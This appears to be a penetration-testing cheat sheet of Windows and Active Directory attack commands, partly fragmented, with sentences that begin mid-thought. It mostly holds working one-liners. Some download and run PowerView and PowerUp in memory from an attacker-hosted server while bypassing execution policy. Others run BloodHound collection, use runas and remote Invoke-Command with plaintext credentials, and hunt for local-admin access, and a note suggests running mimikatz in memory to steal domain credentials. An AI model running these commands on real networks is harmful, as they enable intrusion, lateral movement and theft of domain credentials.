python -SimpleHTTPServer 80
Powershell.exe -nop -exec bypass -c "IEX (New-Object System.Net.WebClient).Downloadfile('http://10.10.10.10/file.txt');"
Powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadFile('http://10.10.10.10/PowerView.ps1','C:\tmp\PowerView.ps1');"
Powershell -exec bypass
Import-module sharphound.ps1
Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -CompressData -SkipPing
dir \\BOX01\c$\
runas /netonly /FQDN\user cmd.exe
runas /netonly /user:customer\ank powershell
Invoke-Command -ComputerName BOX01 -Scriptblock {hostname}
$username = 'DOMAIN\USERNAME'; $password = 'PASSWORD'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Invoke-Command -ComputerName BOX01 -Credential $credential -ScriptBlock {hostname};
Find-LocalAdminAccess
which enumerates which machines the current user is local administrator on. This can be very useful, as you can then remotely execute things like mimikatz on those boxes straight into memory to get the credentials of domain users. If you need an overview of what groups and users are local admin on every box in the environment you can use Invoke-EnumerateLocalAdmin
Invoke-AllChecks
at the bottom of the file. This makes the powershell script execute that function straight into memory after the string has been downloaded. This works for any function inside a powershell-script.Powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”